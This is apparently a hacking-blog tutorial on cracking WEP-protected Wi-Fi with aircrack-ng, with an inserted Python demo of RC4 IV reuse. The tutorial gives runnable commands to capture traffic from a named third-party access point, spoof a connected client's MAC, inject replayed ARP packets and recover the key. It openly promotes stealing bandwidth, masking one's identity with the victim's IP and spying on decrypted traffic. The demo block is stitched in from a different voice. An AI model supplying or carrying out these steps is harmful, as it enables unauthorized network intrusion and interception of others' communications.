Welcome back, my dear whitehat hackers!
When Wi-Fi was first developed in the late 1990s, its security was not a major concern. Unlike a cabled connection, anyone in range could connect to a Wi-Fi access point (AP) and steal bandwidth.
The first attempt to secure these access points was called Wired Equivalent Privacy, or simply WEP. This encryption scheme was in use for some time, and a number of vulnerabilities have been discovered in it. It has largely been replaced by WPA and WPA2.
Despite these well-known weaknesses, a significant number of such APs are still in use.
Apparently, many home users and small businesses bought APs years ago, never updated them, and either don’t realize it or simply don’t care about their vulnerabilities.
These weaknesses make WEP prone to various hacking techniques. WEP uses RC4 for encryption, and RC4 requires the initialization vectors (IVs) to be random. WEP’s implementation of RC4 repeats IVs every 6,000 frames. If we can capture enough IVs, we can recover the key!
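As an added illustration of why a repeated IV is fatal (this is not code from the original post): WEP seeds RC4 with the 3-byte IV prepended to the shared key, so two frames sent under the same IV share one keystream. The block below implements RC4, builds a few constructed WEP-style frames (made-up key and IVs, CRC-32 ICV omitted), flags IV reuse the way a wireless monitor would, and shows that one known plaintext then exposes the other frame with no key at all.

```python
from collections import defaultdict

def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by keystream generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_frame(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: 3-byte IV in the clear, then RC4(iv || key) XOR plaintext.
    The CRC-32 ICV that real WEP appends is left out of this demo."""
    ks = rc4(iv + key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))

def find_iv_reuse(frames: list) -> dict:
    """Monitor-side check: group ciphertext bodies by IV, return IVs seen more than once."""
    by_iv = defaultdict(list)
    for f in frames:
        by_iv[f[:3]].append(f[3:])
    return {iv: cts for iv, cts in by_iv.items() if len(cts) > 1}

def expose_via_reuse(ct_a: bytes, ct_b: bytes, known_plain_a: bytes) -> bytes:
    """Same IV means same keystream, so ct_a ^ ct_b == plain_a ^ plain_b.
    Knowing plain_a (e.g. a predictable header) yields plain_b without the key."""
    return bytes(a ^ b ^ p for a, b, p in zip(ct_a, ct_b, known_plain_a))

# Constructed demo values: a made-up 40-bit key and a short stream of frames.
DEMO_KEY = bytes.fromhex("0102030405")
DEMO_FRAMES = [
    wep_frame(DEMO_KEY, b"\x00\x00\x01", b"ping from host A"),
    wep_frame(DEMO_KEY, b"\x00\x00\x02", b"beacon interval"),
    wep_frame(DEMO_KEY, b"\x00\x00\x01", b"secret payload!!"),  # IV 000001 reused
]

def demo():
    """Returns (list of reused IVs, plaintext of the second frame under the reused IV)."""
    reused = find_iv_reuse(DEMO_FRAMES)
    ct_a, ct_b = reused[b"\x00\x00\x01"]
    return sorted(reused), expose_via_reuse(ct_a, ct_b, b"ping from host A")

if __name__ == "__main__":
    ivs, recovered = demo()
    print("reused IVs:", [iv.hex() for iv in ivs], "| exposed frame:", recovered)
```

With only 2^24 possible IVs, a busy WEP network repeats one quickly, which is why a monitor that raises an alert on any repeated IV is the practical check here.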
Now, you might be wondering, “Why would I want to hack someone’s Wi-Fi when I have my own router and Wi-Fi access?” I can give you countless answers.
First, if we crack someone else’s Wi-Fi router, we can surf the Internet anonymously or, more precisely, with someone else’s IP address. Second, once we have cracked the Wi-Fi router, we can decrypt the traffic and use a tool like Wireshark or tcpdump to capture and spy on all of it. Third, if we use torrents to download large files, we can use their bandwidth rather than our own.
Let’s take a look at WEP hacking with the best wireless hacking tool available, aircrack-ng!
Step 1: Start Aircrack-Ng
Let’s start by opening our favorite Linux distribution, BlackWeb OS, and making sure our wireless adapter is recognized and functional.
We can see that our wireless adapter is recognized and has been named wlan0. In other setups it might be wlan1 or wlan2.
Step 2: Let’s put the wireless adapter in monitor mode
Next, we need to put the wireless adapter into monitor mode, using the following command:
- airmon-ng start wlan0
Note that the interface name has been changed to mon0 by airmon-ng.
Step 3: Capturing the traffic
Now we need to start capturing traffic. We do this by running airodump-ng on the monitoring interface, mon0:
- airodump-ng mon0
Step 4: We start a specific capture on the AP
As the screenshot above shows, there are several WEP-encrypted APs. Let’s go after the second one from the top, with the ESSID “click net”. We copy this AP’s BSSID and start a capture focused on it:
- airodump-ng --bssid A4:99:47:C9:73:A4 -c 11 -w WEPcrack mon0
The above command starts capturing packets from the “click net” SSID on channel 11 and writes them to the WEPcrack file in pcap format. With enough patience, this alone would eventually give us the packets needed to break the WEP key.
But we are not patient; we want it now! To break this key ASAP, we’ll need to inject packets into the AP.
Now we have to wait for someone to connect to the AP so that we can get the MAC address of their network card. Once we have it, we can spoof their MAC and inject packets into the AP. As we can see at the bottom of the screen, someone has connected to the “click net” AP, so we can now speed up the attack.
Step 5: Injection of ARP traffic
To spoof their MAC and inject packets, we use the aireplay-ng command. We need the BSSID of the AP and the MAC address of the client connected to it. We’ll capture an ARP packet and then replay it thousands of times to generate the IVs we need to crack the WEP encryption:
- aireplay-ng -3 -b A4:99:47:C9:73:A4 -h 84:4B:F5:87:CD:08 mon0
As we inject ARPs into the AP, the IVs it generates are captured into our airodump file, WEPcrack.
Step 6: Cracking the password
Once we have several thousand IVs in our WEPcrack file, all we have to do is run aircrack-ng against that file:
- aircrack-ng WEPcrack-01.cap
If we have enough IVs, aircrack-ng will display the key on screen, usually in hexadecimal. We simply take that hex key and enter it when connecting to the AP, and we have free wireless Internet access!
Stay tuned for more guides on cracking wireless networks
Keep coming back to Blackweb for more tutorials on cracking Wi-Fi networks, but also take a look at the other hacking methods. If you have any questions about this guide, you can leave us a message.
Until next time.